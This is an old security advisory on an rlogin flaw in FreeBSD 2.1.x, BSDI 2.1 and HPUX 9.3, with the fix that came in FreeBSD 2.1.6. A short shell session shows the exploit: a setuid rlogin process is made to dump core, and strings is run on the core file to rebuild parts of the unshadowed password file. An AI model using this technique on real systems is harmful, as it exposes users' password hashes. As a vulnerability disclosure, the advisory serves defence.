COMMAND

    rlogin

SYSTEMS AFFECTED

    FreeBSD 2.1.0, 2.1.5, BSDI 2.1, HPUX v9.3 Series 700

PROBLEM

    Roelof W. Temmingh  was able to  reconstruct parts of  un-shadowed
    password file on (at least) FreeBSD 2.1.0 and 2.1.5.

    Take a look at following:

        ~> rlogin 127.0.0.1
        Password:
        Last login: Mon Feb 17 00:35:49 from localhost
        Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
                The Regents of the University of California.   All rights reserved.

        FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996

        You have new mail.

        ~> ps -ax | grep rlogin
         6528  ??  S      0:00.06 rlogind
         6527  p1  S+     0:00.05 rlogin 127.0.0.1
         6529  p1  S+     0:00.01 rlogin 127.0.0.1

        ~> kill -11 6529
        ~> ls
        Brain_Box       NS              cronjobs        mail            security
        Mail            News            foon            rlogin.core

        ~>strings rlogin.core > unshadowed.passwdfile.reconstruct
        ~>vi unshadowed.passwdfile.reconstruct

    and reconstruct..

SOLUTION

    FreeBSD 2.1.6 and later versions will not dump a core file if  the
    process is setuid/setgid.